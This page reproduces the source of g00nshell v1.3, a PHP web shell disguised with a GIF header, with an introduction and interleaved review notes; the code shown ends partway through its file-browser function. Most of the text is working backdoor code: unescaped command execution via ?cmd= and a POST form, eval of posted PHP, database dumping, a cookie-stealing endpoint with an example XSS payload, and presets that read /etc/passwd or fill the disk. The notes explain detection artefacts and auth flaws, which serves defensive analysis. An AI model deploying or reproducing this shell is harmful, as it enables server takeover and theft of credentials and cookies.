
g00nshell v1.3

25 Jan 2014

The g00nshell is a PHP web shell in the same family as c99. Once dropped on a web server it gives whoever can reach the file shell command execution (via `?cmd=` in the URL or a POST form), a file browser/editor/uploader, `eval()` of arbitrary PHP, a MySQL browser, a mail bomber and a cookie-collection endpoint, all running with the web server's privileges. Its optional access controls (User-Agent secret, IP allow-list, HTTP Basic auth) are disabled by default and the Basic-auth mode is bypassable as written, so any copy found on a server should be treated as fully exposed.

g00nshell v1.3 Source Code

  1 GIF89;a
  2 666
  3 <?php
  4 /*
  5 
  6 ###
  7 ###
  8 ###
  9 ###
 10 ###
 11 ###
 12 ###
 13 ###
 14 ###
 15 ###
 16 ###
 17 ###
 18 ###
 19 ###
 20 ###
 21 ###
 22 ###
 23 ###
 24 ###
 25 ###
 26 ###
 27 ###
 28 ###
 29 ###
 30 ###
 31 ###
 32 ###
 33 ###
 34 ###
 35 ###
 36 ###
 37 ###
 38 ###
 39 ###
 40 ###
 41 #                       [g00n]FiSh presents:                         #
 42 #                       g00nshell v1.3 final                         #
 43 
 44 ###
 45 ###
 46 ###
 47 ###
 48 ###
 49 ###
 50 ###
 51 ###
 52 ###
 53 ###
 54 ###
 55 ###
 56 ###
 57 ###DOCUMENTATION
 58 ###
 59 ###
 60 ###
 61 ###
 62 ###
 63 ###
 64 ###
 65 ###
 66 ###
 67 ###
 68 ###
 69 ###
 70 ###
 71 ####
 72 #To execute commands, simply include ?cmd=___ in the url.            #
 73 #Ex: http://site.com/shl.php?cmd=whoami                              #
 74 #                                                                    #
 75 #To steal cookies, use ?cookie=___ in the url.                       #
 76 #Ex: <script>document.location.href=                                 #
 77 #'http://site.com/shl.php?cookie='+document.cookies</script>         #
 78 
 79 ###
 80 ###
 81 ###
 82 ###
 83 ###
 84 ###
 85 ###
 86 ###
 87 ###
 88 ###
 89 ###
 90 ###
 91 ###VERIFICATION LEVELS
 92 ###
 93 ###
 94 ###
 95 ###
 96 ###
 97 ###
 98 ###
 99 ###
100 ###
101 ###
102 ###
103 ####
104 #0: No protection; anyone can access                                 #
105 #1: User-Agent required                                              #
106 #2: Require IP                                                       #
107 #3: Basic Authentication                                             #
108 
109 ###
110 ###
111 ###
112 ###
113 ###
114 ###
115 ###
116 ###
117 ###
118 ###
119 ###
120 ###
121 ###
122 ###
123 ###KNOWN BUGS
124 ###
125 ###
126 ###
127 ###
128 ###
129 ###
130 ###
131 ###
132 ###
133 ###
134 ###
135 ###
136 ###
137 ###
138 ###
139 #Windows directory handling                                          #
140 #                                                                    #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now   #
143 #don't complain to me about it                                       #
144 
145 ###
146 ###
147 ###
148 ###
149 ###
150 ###
151 ###
152 ###
153 ###
154 ###
155 ###
156 ###
157 ###
158 ###
159 ###
160 ###SHOUTS
161 ###
162 ###
163 ###
164 ###
165 ###
166 ###
167 ###
168 ###
169 ###
170 ###
171 ###
172 ###
173 ###
174 ###
175 ###
176 ###
177 #pr0be - Beta testing  & CSS                                         #
178 #TrinTiTTY - Beta testing                                            #
179 #clorox - Beta testing                                               #
180 #Everyone else at g00ns.net                                          #
181 
182 ###
183 ###
184 ###
185 ###
186 ###
187 ###
188 ###
189 ###
190 ###
191 ###
192 ###
193 ###NOTE TO ADMINISTRATORS
194 ###
195 ###
196 ###
197 ###
198 ###
199 ###
200 ###
201 ###
202 ###
203 ###
204 ###
205 ###
206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs.         #
208 
209 ###
210 ###
211 ###
212 ###
213 ###
214 ###
215 ###
216 ###
217 ###
218 ###
219 ###
220 ###
221 ###
222 ###
223 ###
224 ###
225 ###
226 ###
227 ###
228 ###
229 ###
230 ###
231 ###
232 ###
233 ###
234 ###
235 ###
236 ###
237 ###
238 ###
239 ###
240 ###
241 ###
242 ###
243 ###
244 */
245 // Configuration
    // Review notes (defensive): this file is a PHP web shell. The preamble below reads the
    // shell's settings, copies every request parameter into globals unsanitised, and then
    // applies the access-control level selected in $auth. Note that the two lines emitted
    // before the opening <?php tag ("GIF89;a", "666") are sent as response body on every
    // request, so session_start() and every later header() call will fail with "headers
    // already sent" unless output buffering is enabled in php.ini.
246 $auth = 0;
    // 0 = no access control at all: anyone who can request the file gets the shell (shipped default).
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
    // Level 1 compares md5(User-Agent) with this value. The User-Agent is chosen by the client,
    // so this is a shared secret in a request header, not authentication.
248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
    // Level 2 allow-list, matched against REMOTE_ADDR (the TCP peer; behind a reverse proxy
    // that is the proxy's address, not the client's).
249 $email = ""; // E-mail address where cookies will be sent
    // Used by the ?cookie= handler in the dispatcher; empty by default, so mail() is invoked
    // with an empty recipient and its errors are suppressed.
250 $user  = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
    // Level 3 credentials (unsalted MD5). See userauth() for why level 3 does not gate access.
252 // Global Variables
253 $version = "1.3 final";
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
256 $servinf = split("[:]", getenv('HTTP_HOST'));
    // HTTP_HOST is supplied by the client. $servinf[0] is later interpolated, unquoted, into
    // a shell command in lookup(). split() was removed in PHP 7.0 (as were the mysql_*
    // functions used below), so this shell only runs as written on PHP 5.x.
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
260 $curuser = @exec('whoami');
    // Executes a command on every request, before the auth switch below — even at levels 1-3.
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd']; // duplicate of line 261
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
266 $curdir = cleandir(getcwd());
267 if(!$dir){$dir = $_GET['dir'];}
    // $dir has not been assigned at this point, so (without register_globals) this branch is
    // always taken; the two elseif branches below repeat the same condition and are dead.
    // They would also read $_SESSION before session_start() is called on line 274.
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
    // "nullz" is a sentinel used by view() to mean "$f already holds the full path".
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
    // Caps script execution at 5 s; errors (e.g. safe_mode refusing the call) are suppressed.
276 switch($auth){ // Authentication switcher
277   case 0: break;
278   case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
279   case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280   case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
    // Level 3 only calls userauth() when NO Basic-auth username was sent. Any request that
    // carries an Authorization: Basic header with a non-empty username skips the check
    // entirely, whatever the credentials — so level 3 is bypassable as written.
281 }
282     
283 function userauth(){ // Basic authentication function
    // Review notes: this is reached from the level-3 case only when $_SERVER["PHP_AUTH_USER"]
    // is empty (see the auth switch), so md5("") is compared with $user and the test below
    // always fails. Independently, the closing parenthesis of the password test is misplaced:
    // md5($_SERVER["PHP_AUTH_PW"] != $pass) hashes the boolean result of the comparison
    // (md5("1") or md5("")), never the password itself. No 401 status line is sent with the
    // WWW-Authenticate header, so browsers will not prompt for credentials. Net effect with
    // $auth = 3: requests without an Authorization header get the fake 404 from hide(), and
    // requests with one are let straight through by the caller.
284   global $user, $pass;
285   header("WWW-Authenticate: Basic realm='Secure Area'");
286   if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287     hide();
288     die(); // unreachable: hide() already calls die()
289   }
290 }
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
    // Request dispatcher. Order matters: a bare ?cmd= wins over every action except an
    // explicit ?act=, and ?cookie= is handled before any file or directory action.
292 elseif(!$act && $cmd){
    // Primary backdoor entry point (documented in the header): ?cmd=<shell command>, passed
    // to exec() unescaped. Because it is a GET parameter it appears in the web server
    // access log, which makes "cmd=" on this file the simplest artefact to hunt for.
293   style();
294   echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
295   $cmd = exec($cmd, $result);
296   foreach($result as $line){echo($line . "\n");}
    // Command output is echoed unescaped; a "</textarea>" in the output breaks the page.
297   echo("</textarea>");
298 }
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
    // XSS drop-box: the stolen cookie string is mailed to $email (empty in the shipped config,
    // errors suppressed) and the victim is shown the fake 404 from hide().
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
    // $gf is the URL chosen on the tools() page; grab() fetches it with wget into $_POST['loc'].
303 elseif($dir){files($dir);}
304 else{
305   switch($act){
306     case "phpinfo": phpinfo();break;
307     case "sql": sql();break;
308     case "files": files($dir);break;
309     case "email": email();break;
310     case "cmd": cmd();break;
311     case "upload": upload();break;
312     case "tools": tools();break;
313     case "sqllogin": sqllogin();break;
314     case "sql": sql();break; // duplicate of the case on line 307; never reached
315     case "lookup": lookup();break;
316     case "kill": kill();break;
    // kill() is not defined anywhere in the source shown here; unless it is defined further
    // down, act=kill is a fatal "undefined function" error rather than a self-delete.
317     case "phpexec": execphp();break;
318     default: main();break;
    // The 'bshell' entry in main()'s menu has no case here and falls through to main().
319   }
320 }
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
    // Canonicalises a path for display and links: resolves ".." and symlinks via realpath(),
    // then normalises Windows-style separators to "/". realpath() returns false for a path
    // that does not exist (or is outside open_basedir); that false is returned unchanged, and
    // files() treats it as "no directory" and falls back to $curdir.
322   $d = realpath($d);
323   $d = str_replace("\\\\", "//", $d); // a doubled backslash (\\) becomes "//"
324   $d = str_replace("////", "//", $d);
325   $d = str_replace("\\", "/", $d);    // any remaining single backslash becomes "/"
326   return($d);
327 }
328 function hide(){ // Hiding function
    // Serves a page that imitates Apache's default 404 ErrorDocument and exits. No status
    // line is set, so the HTTP status stays 200 while the body says "404 Not Found" — a
    // mismatch that proxy logs or a scanner can flag. The body also reflects the server
    // banner and the host/port taken from the client's Host header.
329   global $self, $soft, $servip, $servport;
330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the request.
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
342 function style(){ // Style / header function
    // Emits the HTML head and inline CSS shared by every page of the shell (black background,
    // Verdana 11px). The <title> "g00nshell v<version> - <host>" is a stable string that can
    // be used as a response-body signature. $servip comes from the Host header and is
    // interpolated unescaped.
343   global $servip,$version;
344   echo("<html>\n
345   <head>\n
346   <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347   <style>\n
348   body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
349   h1 { color:white; font-family:Verdana; font-size:11px; }\n
350   h3 { color:white; font-family:Verdana; font-size:11px; }\n
351   input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352   textarea { font-family:Courier; font-size:11px; }\n
353   a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
354   a:hover { color:#7F7F7F; }\n
355   td,th { font-size:12px; vertical-align:middle; }\n
356   th { font-size:13px; }\n
357   table { empty-cells:show;}\n
358   .inf { color:#7F7F7F; }\n
359   </style>\n
360   </head>\n");
361 }
362 function main(){ // Main/menu function
    // Landing page: host/server/uname recon, a hidden "More" panel with whoami, id,
    // safe_mode, open_basedir, disable_functions and MySQL availability, the action menu,
    // and an iframe that immediately loads ?act=files. Every render therefore produces a
    // second request for the directory listing and runs `id` via exec().
363   global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
    // $banner is imported but never used here.
364   style();
365   $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
366   'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
    // 'bshell' has no handler in the dispatcher; 'kill' maps to a kill() not defined in the source shown.
367   $capt = array_flip($act);
368   echo("<form method='GET' name='shell'>"); // this <form> is never closed
369   echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370   echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371   echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372   echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373   echo("<div style='display:none' id='info'>");
374   echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
375   echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376   if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
377   else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378   echo("\n<br>\n");
379   if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380   else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381   echo("\n<br>\n");
382   if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
383   else{echo("<b>Disabled functions:</b> None");}
384   echo("\n<br>\n");
385   if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
    // mysql_connect is passed as a bare constant; PHP treats the undefined constant as the
    // string "mysql_connect" (with a notice, suppressed here), so the check still works.
386   else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387   echo("</div>");
388   echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
389   echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
390   echo("<center>");
391   echo("<h3 align='center'>Links</h3>");
392   if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
    // The raw query string is reflected into each href without escaping.
393   else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
394   echo("</center>");
395   echo("<hr>");
396   echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
397   echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
398   die();
399 }
400 function cmd(){ // Command execution function
    // POST variant of the ?cmd= backdoor: a free-text command or one of the presets below is
    // passed to exec() unescaped. Since the command travels in the POST body, a standard
    // access log shows only "act=cmd" — the command itself is not logged.
401   style();
402   echo("<form name='CMD' method='POST'>");
403   echo("<b>Command:</b><br>");
404   echo("<input name='cmd' type='text' size='50'> ");
405   echo("<select name='precmd'>");
    // Presets: account enumeration, listening sockets, process list, kernel version, uid,
    // a 1 GiB zero-filled file in /tmp (disk-fill), and a filesystem-wide search for
    // files named "passwd".
406   $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
407                   'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408                   'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
409                   'Find passwd files'=>'find / -type f -name passwd');
410   $capt = array_flip($precmd);
411   foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412   echo("</select><br>\n");
413   echo("<input type='submit' value='Execute'>\n");
414   echo("</form>\n");
415   if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416   elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417   else{die();}
418   echo("Results: <br><textarea rows=20 cols=100>");
419   $cmd = @exec($x, $result);
    // If exec() is in disable_functions the error is suppressed and the result is simply empty.
420   foreach($result as $line){echo($line . "\n");}
421   echo("</textarea>");
422 }
423 function execphp(){ // PHP code execution function
    // Evaluates arbitrary PHP posted in the "phpexec" field. eval is a language construct,
    // not a function, so disable_functions does not block this path even where exec()/
    // system() are disabled. htmlentities() is applied only when echoing the submitted code
    // back into the form; the code itself is eval'd raw (after stripslashes, to undo
    // magic_quotes_gpc) and its output goes unescaped into the result textarea.
424   style();
425   echo("<h4>Execute PHP Code</h4>");
426   echo("<form method='POST'>");
427   echo("<textarea name='phpexec' rows=5 cols=100>");
428   if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429   echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430   echo("<input type='submit' value='Execute'>");
431   echo("</form>");
432   if($_POST['phpexec']){
433     echo("<textarea rows=10 cols=100>");
434     eval(stripslashes($_POST['phpexec']));
435     echo("</textarea>");
436   }
437 }
438 function sqllogin(){ // MySQL login function
    // Renders the MySQL credential form (posted to ?act=sql) and exits. session_start() has
    // already been called at file level, so this second call raises a notice. The Location
    // header for an already-logged-in session is not followed by exit, so the form is still
    // rendered beneath it (and the header itself will fail if output was already sent).
439   session_start();
440   if($_SESSION['isloggedin'] == "true"){
441     header("Location: ?act=sql");
442   }
443   style();
444   echo("<form method='post' action='?act=sql'>");
445   echo("User:<br><input type='text' name='un' size='30'><br>\n");
446   echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447   echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
448   echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449   echo("<input type='submit' value='Login'>");
450   echo("</form>");
451   die();
452 }
453 function sql(){ // General SQL Function
    // MySQL browser. Credentials posted from sqllogin() are stored in plaintext in
    // $_SESSION (sql_user / sql_password / sql_host / sql_port) — the PHP session file on
    // the server is therefore a forensic artefact holding the database credentials the
    // attacker used. All SQL is built by string concatenation from $_GET (db, table,
    // sqlquery); arbitrary queries are the feature, not a bug, of this page.
454   session_start();
455   if(!$_GET['sqlf']){style();}
    // style() is skipped for sqlf=dl so that sqldownload() can still send headers.
456   if($_POST['un'] && $_POST['pw']){;
457     $_SESSION['sql_user'] = $_POST['un'];
458     $_SESSION['sql_password'] = $_POST['pw'];
459   }
460   if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461   else{$_SESSION['sql_host'] = 'localhost';}
462   if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463   else{$_SESSION['sql_port'] = '3306';}
    // Host/port are reset to localhost:3306 on every request that does not re-post them.
464   if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465     if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466       unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
467       echo("Invalid credentials<br>\n");
468       die(sqllogin());
469     }
470     else{
471       $_SESSION['isloggedin'] = "true";
472     }
473   }
474   else{
475     die(sqllogin());
476   }
477   if ($_GET['db']){
478     mysql_select_db($_GET['db'], $sqlcon);
479     if($_GET['sqlquery']){
    // Free-form query: only the first column of each row is printed (mysql_result with no
    // field argument); a non-SELECT statement returns true, which mysql_num_rows rejects.
480       $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481       $num = mysql_num_rows($dat);
482       for($i=0;$i<$num;$i++){
483         echo(mysql_result($dat, $i) . "<br>\n");
484       }
485     }
486     else if($_GET['table'] && !$_GET['sqlf']){
    // Table view, 30 rows per page. Rows are not read from the SELECT * result below;
    // instead each cell is fetched with its own query "WHERE <first column> = '<x>'" for
    // x = 1..N, so the view assumes the first column holds consecutive integers starting
    // at 1 and silently omits any row whose key is not in that range. The first iteration
    // (x=1, y=0) never satisfies "y > 0", so the row with key 1 is never shown either.
487       echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
488       echo("<table border='1'>");
489       $query = "SHOW COLUMNS FROM " . $_GET['table'];
490       $result = mysql_query($query, $sqlcon) or die(mysql_error());
491       $i = 0;
492       $fields = array();
493       while($row = mysql_fetch_assoc($result)){
494         array_push($fields, $row['Field']);
495         echo("<th>" . $fields[$i]);
496         $i++;
497       }
498       $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
499       $num_rows = mysql_num_rows($result) or die(mysql_error());
    // An empty table yields 0 rows, which is falsy, so this dies with an empty error string.
500       $y=0;
501       for($x=1;$x<=$num_rows+1;$x++){
502         if(!$_GET['p']){
503           $_GET['p'] = 1;
504         }
505         if($_GET['p']){
506           if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
507             echo("<tr>");
508             for($i=0;$i<count($fields);$i++){
509               $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
510               $dat = mysql_query($query, $sqlcon) or die(mysql_error());
511               while($row = mysql_fetch_row($dat)){
512                 echo("<td>" . $row[0] . "</td>"); // cell values are echoed unescaped
513               }
514             }
515             echo("</tr>\n");
516           }
517         }
518         $y++;
519       }
520       echo("</table>\n");
521       for($z=1;$z<=ceil($num_rows / 30);$z++){
522         echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
523       }
524     }
525     elseif($_GET['table'] && $_GET['sqlf']){
526       switch($_GET['sqlf']){
527         case "dl": sqldownload();break;
528         case "ins": sqlinsert();break;
529         default: $_GET['sqlf'] = "";
530       }
531     }
532     else{
    // Database view: list tables with a Download link each.
533       echo("<table>");
534       $query = "SHOW TABLES FROM " . $_GET['db'];
535       $dat = mysql_query($query, $sqlcon) or die(mysql_error());
536       while ($row = mysql_fetch_row($dat)){
537         echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
538       }
539       echo("</table>");
540     }
541   }
542   else{
    // No db selected: list every database the credentials can see.
543     $dbs=mysql_list_dbs($sqlcon);
544     while($row = mysql_fetch_object($dbs)) {
545       echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
546     }
547   }
548   mysql_close($sqlcon);
549 }
550 function sqldownload(){ // Download sql file function
    // Dumps a table as a list of "('v1', 'v2', ...);" tuples (no INSERT header, so the file is
    // not directly loadable) and sends it as an attachment named <table>-<unix time>.sql.
    // Uses the same "WHERE <first column> = '<x>'" per-cell scheme as sql(), with the same
    // assumption that the first column is 1..N; the loop runs x from 1 while x < $num_rows,
    // so the last row is always omitted. Values are not escaped: only CR/LF is replaced,
    // and only for non-final columns, and empty values become the quoted string 'NULL'.
551   @ob_flush;
    // Bare constant, not a call: this is an undefined-constant expression (notice suppressed)
    // and flushes nothing.
552   $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
553   mysql_select_db($_GET['db'], $sqlcon);
554   $query = "SHOW COLUMNS FROM " . $_GET['table'];
555   $result = mysql_query($query, $sqlcon) or die(mysql_error());
556   $fields = array();
557   while($row = mysql_fetch_assoc($result)){
558     array_push($fields, $row['Field']);
559     $i++; // $i is never initialised or used here
560   }
561   $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
562   $num_rows = mysql_num_rows($result) or die(mysql_error());
563   for($x=1;$x<$num_rows;$x++){
564     $out .= "("; // $out is never initialised; first append raises a notice
565     for($i=0;$i<count($fields);$i++){
566       $out .= "'";
567       $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
568       $dat = mysql_query($query, $sqlcon) or die(mysql_error());
569       while($row = mysql_fetch_row($dat)){
570         if($row[0] == ""){
571           $row[0] = "NULL";
572         }
573         if($i != count($fields)-1){
574           $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
575         }
576         else{
577           $out .= $row[0]. "'";
578         }
579       }
580     }
581     $out .= ");\n";
582   }
583   $filename = $_GET['table'] . "-" . time() . '.sql';
584   header("Content-type: application/octet-stream");
585   header("Content-length: " . strlen($out));
586   header("Content-disposition: attachment; filename=" . $filename . ";");
    // The attachment name is built from the raw ?table= value.
587   echo($out);
588   die();
589 }
590 function sqlinsert(){
    // Insert-row form for ?table=. On POST every field is taken verbatim: column names come
    // from array_flip($_POST) (values become keys, so two fields posted with the same value
    // collapse into one column while the VALUES list keeps both — a column/value count
    // mismatch that mysql reports), and values are not quoted or escaped, so string values
    // must be quoted by the user. No comment in the header mentions this form is unfinished
    // beyond "no editing function".
591   style();
592   $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
593   mysql_select_db($_GET['db'], $sqlcon);
594   if($_POST['ins']){
595     unset($_POST['ins']); // drop the submit button so it is not treated as a column
596     $fields = array_flip($_POST);
597     $f = implode(",", $fields);
598     $v = implode(",", $_POST);
599     $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
600     mysql_query($query, $sqlcon) or die(mysql_error());
601     die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
602   }
    // GET: render one text input per column of the table.
603   $query = "SHOW COLUMNS FROM " . $_GET['table'];
604   $result = mysql_query($query, $sqlcon) or die(mysql_error());
605   $i = 0;
606   $fields = array();
607   echo("<form method='POST'>");
608   echo("<table>");
609   while($row = mysql_fetch_assoc($result)){
610     array_push($fields, $row['Field']);
611     echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
612     $i++;
613   }
614   echo("</table>");
615   echo("<br>\n<input type='submit' value='Insert' name='ins'>");
616   echo("</form>");
617 }
618 function nicesize($size){
    // Formats a byte count as a whole number rounded to the nearest B/KB/MB/GB (1024-based).
    // Returns false for 0, "", null or any other falsy $size; files() turns that into "0B".
619   if(!$size){return false;}
620   if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
621   elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
622   elseif ($size >= 1024){return(round($size / 1024) . " KB");}
623   else{return($size . " B");}
624 }
625 function files($dir){ // File manipulator function
    // Directory browser. Lists folders then files, colouring each entry by what the web
    // server user can do with it (green = writable, yellow = readable, red = neither), with
    // a size column and an icon served by img(). "." and ".." are not filtered out and are
    // listed as folders. Path, query string and every file name are reflected into the HTML
    // without escaping.
626   style();
627   global $self, $curdir;
628   if($dir==""){$dir = $curdir;}
    // Loose comparison: the false that cleandir() returns for a non-existent path also
    // lands here and falls back to the shell's own directory.
629   $dirx = explode("/", $dir);
630   $files = array();
631   $folders = array();
632   echo("<form method='GET'>");
633   echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
634   echo("<input type='submit' value='Go'>");
635   echo("</form>");
636   echo("<h4>File list for ");
637   for($i=0;$i<count($dirx);$i++){
638     $totalpath .= $dirx[$i] . "/"; // $totalpath is never initialised (notice on first append)
639     echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
640   }
641   echo("</h4>");
642   echo("<table>");
643   echo("<th>File Name<th>File Size</th>");
644   if ($handle = opendir($dir)) {
    // If opendir() fails nothing is listed and the <table> is left unclosed.
645     while (false != ($link = readdir($handle))) {
    // Loose "!=": an entry literally named "0" compares equal to false and ends the loop early.
646       if (is_dir($dir . '/' . $link)){
647         $file = array();
648         if(is_writable($dir . '/' . $link)){$file['perm']='write';}
649         elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
650         else{$file['perm']='none';}
651         switch($file['perm']){
652           case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
653           case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
654           case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
655           default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
656         }
657         @$file['icon'] = "folder";
658         if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
659         else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
660         array_push($folders, $folder);
661       }
662       else{
663         $file = array();
664         $ext = strtolower(end(explode(".", $link)));
    // end() on a function result (not a variable) raises a strict-standards notice.
665         if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
666           $file['size'] = "0B";
667         }
668         if(is_writable($dir . '/' . $link)){$file['perm']='write';}
669         elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
670         else{$file['perm']='none';}
671         switch($file['perm']){
672           case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
673           case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
